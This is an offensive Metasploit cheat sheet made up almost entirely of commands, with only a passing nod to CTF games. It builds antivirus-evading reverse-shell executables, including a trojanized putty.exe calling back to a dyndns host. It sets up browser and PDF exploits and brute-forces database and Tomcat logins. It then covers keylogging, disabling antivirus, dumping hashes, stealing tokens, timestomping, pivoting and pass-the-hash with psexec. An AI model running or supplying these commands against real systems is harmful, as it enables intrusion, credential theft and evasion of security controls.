————————————————————–| Common Tasks and Maintenance |
================ Basics
msfupdate
msfconsole
search (some exploit type)
db_status
workspace -h
hosts -h
sessions -h
services -h
db_import
db_nmap
show options
loot -h
creds
search value

======================= MSF thru a socks proxy
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run

(then edit /etc/proxychains to route thru)

Run thru Proxy
For socksV4 do :
set Proxies socks4:192.168.1.2:1080

and for HTTP Connect
set Proxies HTTP:192.168.1.2:8080

======================= MSF Create PostGreSQL DB (Not required for Kali)
sudo apt-get install postgresql libpgsql-ruby libpq-dev
sudo gem install pg
Become the system postgres user:
sudo su postgres
Creating a database user:
createuser -D -P -R -S username
Enter password
Creating a database:
createdb –owner=username metasploit4
exit

Configure Metasploit
Start the framework, then enter the following commands:
msf > db_connect username:[password]@127.0.0.1:5432/metasploit4
or simply:
msf > db_connect -y /opt/backbox/config/database.yml
msf > workspace -a MyProject

Enable the database on startup
cat > ~/.msf4/msfconsole.rc
db_connect username:[password]@127.0.0.1:5432/metasploit4

====================== Create your own MSF Module

require ‘msf/core’
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
‘Name’ => ‘My custom TCP scan’,
‘Version’ => ‘$Revision: 1 $’,
‘Description’ => ‘My quick scanner’,
‘Author’ => ‘Your name here’,
‘License’ => MSF_LICENSE
)
register_options(
[
Opt::RPORT(12345)
], self.class)
end

def run_host(ip)
connect()
greeting = “HELLO SERVER”
sock.puts(greeting)
data = sock.recv(1024)
print_status(“Received: #{data} from #{ip}”)
disconnect()
end
end

————————————————————–| Scan & Exploit Stuff |

 

======================= XMAS Tree Scan

msfcli auxilary /scanner/portscan/xmas A
msfcli auxilary /scanner/portscan/xmas S
msfcli auxilary /scanner/portscan/xmas O

====================== Enumerate the remote network

run netenum
run netenum -ps -r 192.168.0.0/24
run post/windows/gather/arp_scanner RHOSTS=192.168.0.0/24 <<<<<<<<< This is good for firewalled hosts but ENT switches may kill port due to multi lookups

====================== Static Payloads

Create EXE Stager
msfpayload windows/meterpreter/bind_tcp EXITFUNC=process LPORT=64254 R | msfencode –e x86/shikata_ga_nai -c 13 -t exe -o Bad.exe

Turn up the packing algorithm passes or tagging to a legit binary to reduce the Virus Total matches signifcantly.
./msfpayload windows/meterpreter/reverse_https LHOST=symantec20.dyndns.org R | ./msfencode -t exe -x ../downloads/putty.exe -k -o newputty.exe -e x86/shikata_ga_nai -c 6

( OR )

./msfpayload windows/shell_reverse_tcp LHOST=<my IP> LPORT=<my port> R | ./msfencode -e x86/shika_ga_nai -x Good.exe -c 6 -k -o Bad.exe

sudo ./msfcli multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=<my IP> LPORT=<my port> E <<<<<<<<< or use Catch a Shell

======================= Hiding MSF Shell Payload

(Windows Tip for running CMD while evading IDS systems)
execute -c -H -f cmd -a “/k” -i
(this will supress the full bannername for CMD in the packets which usually triggers some security alert)

======================= Brute Force Everything

(MYSQL)
use auxilary/scanner/mysql/mysql_login
show options
set RHOSTS tar.get.ip.address
set user_file /my/username/list
set pass_file /my/password/list
exploit

(PostGreSQL)
use auxilary/scanner/postgres/postgres_login
show options
set RHOSTS tar.get.ip.address
set user_file /my/username/list
set pass_file /my/password/list
exploit

(Tomcat)
use auxilary/scanner/http/tomcat_mgr_login
show options
set RHOSTS tar.get.ip.address
set user_file /my/username/list
set pass_file /my/password/list
exploit

======================= Browser AutoPWN

msfconsole
search autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
show options
set LHOST my.ip.add.ress
set URIPATH “filetypes”
exploit

======================= IE Browser Direct Attack

sudo ./msfconsole

use exploit/windows/browser/ie_cgenericelement_usf <<<<<<<<< Targeted Attack for IE
set ExitOnSesssion false
set URIPATH /plugins <<<<<<<<<<<<<<<<<<<< Give it some fake ass URI name
set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnsession false
set LHOST my.ip.address
exploit -j

======================= PDF Exploit

msfconsole
search pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evil-Document.pdf
set INFILENAME Document.pdf
Exploit

======================= SMB Exploit Scan

db_nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1 [target networks]

======================= SMB Conflicker Scan

db_nmap –script p2p-conficker,smb-os-discovery,smb-check-vulns -p- –script-args checkall=1,safe=1 -T4 [target networks]

 

————————————————————–| Post Exploitation Stuff |

 

======================= Key Logging

keyscan_start
keyscan_dump
keyscan _stop
del my_exploit.exe
clearav
ps (check processes)
kill process_id
steal_token

====================== All About Shells

./msfconsole

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp

set ExitOnSession false <<<<<<<<<<< Allows us to have multiple sessions
set LHOST my.ip.address
set LPORT 7777
exploit -j

AFTER SHELLS

sysinfo < == Show Windows info
getuid < == Show Current Username
getsystem <== escalate to system level access
getuid <== Verify we have system

rev2self <=== Revert to first access level
getuid

====================== Kill AV

getsystem
run killav

====================== Check for VM Instance

getsystem
run post/windows/gather/checkvm <== Check if Im a VM instance

====================== Steal Hash

getsystem
run post/windows/gather/hashdump

==================== Enumeration Remote System

meterpreter > run getcountermeasure <<< Shows What Protections are in Pace
meterpreter > run winenum <<< Shows All the Windows Info You Can Think Of
meterpreter > run post/windows/gather/enum_applications <<<< Show Installed Apps
meterpreter > run post/windows/gather/enum_logged_on_users <<<< Show Logged In Users
meterpreter > run post/windows/gather/usb_history <<<< USB Device History
meterpreter > run post/windows/gather/enum_shares <<<< Shows Shares
meterpreter > run post/windows/gather/enum_snmp <<<< Show SNMP Info
meterpreter > reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

====================== Steal Tokens

getsystem
use incongnito
list_tockens -u <<<<< show users with valid cred in memory
list_tokens -g <<<<< show groups with valid cred in memory
impesonate_token HOSTNANME\\Administrator
getuid
<<<<<<<<<<<<<<<<< Think about service accounts as targets.. services run as system
<<<<<<<<<<<<<<<<<< Then take a domain_admin token
<<<<<<<<<<<<<<<<<<< This only works for accounts allowed to delegate (not the default setting for account creation in AD)

====================== Prove Access (for CTF Games)

upload my.name.txt c:\\
timestomp C:\\my.name.txt -v
timestomp C:\\my.name.txt -m “01/01/0001 01:01:01”
timestomp C:\\my.name.txt -v

====================== Setup a Pivot thru Remote System

[CTRL-z] (y) <<<<<<< Background Session
msf exploit(handler)> back <<<<<<<<<<<< Get back to main MSF prompt
msf>

sessions -l <<<<<< find another session you want to pivot thru note the IP and session #

Now setup pivot with a route add

route print

route add my.pivot.ip.session 255.255.255.0 session.#

route print

====================== Now scan thru my Pivot

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.0.0/24
set THREADS = 10
run

================= Reheat the Hash

After you have the valid hash use it directly to use PSexec to collect up more shells cause we love the fuk outta some shells

use exploit/windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.0.5
set LHOST 192.168.0.6
set SMBUser SomeUserName
set SMBPass 00000000000000000000000000000000:E5810F3C99AE2ABB2232ED8458A61309
exploit